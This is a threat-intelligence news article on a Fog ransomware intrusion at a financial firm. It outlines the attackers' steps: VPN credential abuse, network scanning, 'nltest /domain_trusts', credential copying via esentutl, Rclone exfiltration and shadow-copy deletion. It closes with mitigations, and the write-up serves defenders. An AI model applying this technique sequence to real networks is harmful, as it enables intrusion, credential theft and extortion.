The Fog Ransomware group, known for targeting education and recreation sectors, has expanded its scope to attack financial services organizations, where the attackers exploited compromised VPN credentials to deploy the ransomware, targeting both Windows and Linux endpoints.
It has detected the ransomware activity and isolated the affected machines, preventing data encryption and theft.
While the attack originated from IP addresses in Russia, this alone cannot definitively attribute the attack to a specific geographic location due to potential masking techniques.
The Fog ransomware, a variant of STOP/DJVU, exploits compromised VPN credentials to infiltrate networks, primarily targeting education and recreation sectors.
After gaining administrative access, it disables security measures, encrypts VMDKs, and deletes backups, leaving victims with limited options.
The ransomware, marked with extensions like ‘.FOG’ or ‘.FLOCKED’, demands a ransom via a Tor network platform.
Unlike traditional APT groups, Fog’s origin remains unattributed, suggesting a new, highly skilled threat actor.
The attackers began their network exploration by sending ping requests to various network devices and saving the results in text files named ‘pings.txt’ and ‘pingw.txt’.
Using elevated privileges obtained from compromised service accounts, they then employed the ‘Advanced_Port_Scanner_2.5.3869(1).exe’ tool to scan network hosts for open ports and gather detailed information about their services, which allowed them to identify potential vulnerabilities and entry points into the network.
The Adlumin team discovered that a Russian IP address had compromised an unprotected system, initiating the attack, where the attackers exploited compromised service accounts and domain trust relationships to traverse the network.
They executed the ‘nltest /domain_trusts’ command to gather information about domain trust relationships. Subsequently, they employed the ‘SharpShares.exe’ binary to map network drives and share folders on other devices, facilitating further lateral movement within the network.
Are You From SOC/DFIR Teams? - Try Advanced Malware and Phishing Analysis With ANY.RUN - 14 day free trial
The attacker used the `esentutl.exe` command-line tool to create a backup of login data stored in the Google Chrome user profile folder, which included encrypted credentials for various websites.
The backup was saved to a temporary file in the same directory, allowing the attacker to potentially extract the credentials later using decryption techniques.
The attacker leveraged Rclone, a file transfer tool, to selectively sync recently modified data (excluding specific file types) from compromised systems.
Next, they executed “locker.exe” with the “-id” switch, likely containing a unique identifier for the attack, where the “-target” switch specified a network share for data exfiltration.
Finally, the attackers deployed WMIC and PowerShell commands to eliminate shadow copies, hindering file recovery from backups, which demonstrates a multi-pronged approach, combining data theft with encryption to pressure victims into paying the ransom.
The security team identified and isolated endpoints compromised by a Fog ransomware attack and found malicious binaries and vulnerable endpoints that allowed unauthorized access.
To mitigate risks, it has been recommended to implement MFA, update VPN software, monitor VPN access, automate endpoint isolation, use a comprehensive security platform, disable unnecessary services, regularly back up data, applying the principle of least privilege, conducting security audits, establishing incident response plans, and monitoring network traffic.
What Does MITRE ATT&CK Expose About Your Enterprise Security? - Watch Free Webinar!